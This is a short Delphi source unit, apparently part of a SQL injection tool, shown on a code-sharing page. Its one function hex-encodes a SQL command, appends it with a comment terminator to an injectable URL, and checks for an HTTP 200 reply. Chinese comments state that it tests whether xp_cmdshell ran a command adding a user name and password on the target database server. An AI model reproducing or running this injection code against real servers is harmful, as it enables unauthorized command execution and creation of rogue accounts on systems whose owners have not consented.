📄 nb_sqlscript.pas
字号:
unit nb_sqlScript;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms;
function NbSqlCmd_Shell(URL: string;SQLCMD: string ): Boolean; //判断是否成功执行xp_cmdshell的添加用户名和密码
implementation
uses
define_Unit, main_unit;
//判断是否成功执行xp_cmdshell的添加用户名和密码,Url--提交注入的url;SQLCMD--利用xp_comshell执行的sql命令
function NbSqlCmd_Shell(URL: string;SQLCMD: string): Boolean;
var
tempCMD,strURL:string;
begin
tempCMD:=SQLINJECTIONUrlToHex(SQLCMD+'--',0);
strURL:=URL+tempCMD;
// if Main_unit.GetWebBool(strURL) then
if define_unit.GetURLCode(strURL)=200 then
Result:=true
else
Result:=false;
end;
//************************************************************
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -